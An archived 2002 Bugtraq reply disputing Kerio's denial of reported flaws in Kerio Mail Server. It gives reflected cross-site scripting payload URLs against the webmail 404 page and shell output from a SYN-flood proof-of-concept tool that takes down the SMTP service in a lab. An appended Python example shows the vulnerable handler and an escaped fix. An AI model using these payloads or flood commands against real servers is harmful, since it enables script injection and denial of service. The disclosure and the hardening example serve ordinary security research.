Re: Kerio Mail Server Multiple Security vulnerabilities

From: Abraham Lincoln (sunninja@scientist.com)
Date: 08/29/02


From: "Abraham Lincoln" <sunninja@scientist.com>
To: bugtraq@securityfocus.com
Date: Thu, 29 Aug 2002 08:35:56 +0800

Hi.

  This is a straightforward answer to what Mr. Jaroslav Snajdr of
Kerio.com mail server dev is claiming, that Kerio Mail Server is not
vulnerable. To clear things up and let the people judge.

    By the way Mr. Snajdr, I'm receiving emails confirming that the
vulnerability in ur product DOES EXIST. Anyway, I'll proceed to the
explanation of reproducing the vulnerability.

  We will show u if this advisory is real or not, because we will be
releasing another SECURITY ADVISORY against the newest version of Kerio
Mail Server.

   1] Cross-Site Scripting Vulnerability with Kerio
"secure" Web Mail module.

   Try this:
      http://keriowebmail/>alert('THisIsREAL0wned')</script>

Even the 404 page is vulnerable? Funny. Mr. Kevin of spidy, thanks ;)
 
 Another sample:

http://keriowebmail/passwd>alert('VERYVULNERABLE')</script>

 funny ;)
 
   So Kerio is not vulnerable to cross-site scripting? ;P Now u g0t an
idea how to recode ur insecure coding style. Want to know more about
cross-site scripting? Read the FAQ and search for it on Google. ;p

    Others are not yet to be divulged; they will be released in the next
advisory this week ;)

  2] DoS Vulnerability with Every Kerio Mail Server Service.

        Some people think (*shrug*) that securing the TCP/IP stack
of the operating system could protect their application against DoS.
Let people judge:

Test Bed: [*nix with synflood] <-----------> [WinNT with SP6a
/ Win2k SP3 with Kerio Mail Server] (note: all Win servers are hardened
;)

synmail = our synflood Proof of Concept Code
Kerio Mail Server IP = 192.168.0.1
Sendmail IP = 192.168.0.2

  [root@NSSIlabs]# ./synmail
   ./synmail <destinationIP> <Port> <num of packets>

   [root@NSSIlabs]# ./synmail 192.168.0.1 25 40
   Targeting host 192.168.0.1 .......
   done!
   
  [root@NSSIlabs]# telnet 192.168.0.1 25
  Trying 192.168.0.1...
  telnet: Unable to connect to remote host: Connection refused

  [root@NSSIlabs]# nc 192.168.0.1 25
   
  Note: no reply from netcat ;) meaning the port is closed after
targeting port 25 with 40 SYN packets

   Vulnerable or No? ;)

 Another test against another mail server (Sendmail) ;)

   [root@NSSIlabs]# ./synmail
   ./synmail <destinationIP> <Port> <num of packets>

   [root@NSSIlabs]# ./synmail 192.168.0.2 25 50
   Targeting host 192.168.0.2 .......
   done!

Note: as u would notice, we increased the SYN packets to 50. ;)
   
  [root@SunNinja remote]# telnet 192.168.0.2 25
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
220 nssilabs.nssolution.COM ESMTP Sendmail 8.9.3/8.9.3; Wed, 28 Aug 2002 03:14:37 +0800

   It's for you to judge if this is wrong or right. People who are
reading this may test it on their own ;)
          
   We will be releasing another Security Advisory regarding the newest
version of Kerio Mail Server ;)

   Hey Mr. Snajdr, if u think that this demo is not acceptable or so,
there's nothing we can do about it. We just found a flaw in your
application and we informed you about it before releasing the advisory
for u to release a patch, but unfortunately we received emails from you
that this vulnerability report is fake. Anyway, people who are reading
this will be the ones to judge ;)

   Thanks and good day! ;)
   
Regards,
Abraham
NSSI Research Labs
"When They say that their Technology is Un-Breakable they are
Lying..." - Bruce
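The 404-page reflection described in the post above, as an added example (not Kerio's code and not from the original message): a hypothetical 404 handler that echoes the request path into the HTML body unencoded, beside the hardened form that HTML-encodes the path first, plus a regression check that flags any handler reflecting the probe verbatim. The handler names, the probe string and the audited paths are all constructed here.

```python
import html
from urllib.parse import unquote

# Constructed probe in the spirit of the post: markup smuggled in the request path.
PROBE = "<script>alert('THisIsREAL0wned')</script>"


def not_found_vulnerable(path: str) -> str:
    """Hypothetical 404 handler that echoes the raw (URL-decoded) request path
    into the HTML body. Anything the client put in the path becomes markup."""
    return ("<html><body><h1>404 Not Found</h1>"
            f"<p>The page {unquote(path)} was not found.</p></body></html>")


def not_found_hardened(path: str) -> str:
    """Same handler, but the path is HTML-encoded before being reflected.
    html.escape turns < > & " ' into entities, so the path can no longer
    close or open a tag or an attribute in the response."""
    safe = html.escape(unquote(path), quote=True)
    return ("<html><body><h1>404 Not Found</h1>"
            f"<p>The page {safe} was not found.</p></body></html>")


def reflects_markup(body: str, probe: str) -> bool:
    """True when the probe survives verbatim in the response body, i.e. the
    handler reflected it unencoded. Used as a regression check in tests."""
    return probe in body


def audit(handler) -> dict:
    """Run a handler over a few constructed paths (plain, raw tag, tag after a
    file name, percent-encoded tag) and report which ones reflect a raw
    '<script' opening. A clean handler reports no hits at all."""
    paths = ["/missing", "/" + PROBE, "/passwd" + PROBE, "/%3Cscript%3E"]
    return {p: reflects_markup(handler(p), "<script") for p in paths}


if __name__ == "__main__":
    for name, handler in (("vulnerable", not_found_vulnerable),
                          ("hardened", not_found_hardened)):
        print(name, audit(handler))
```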
    
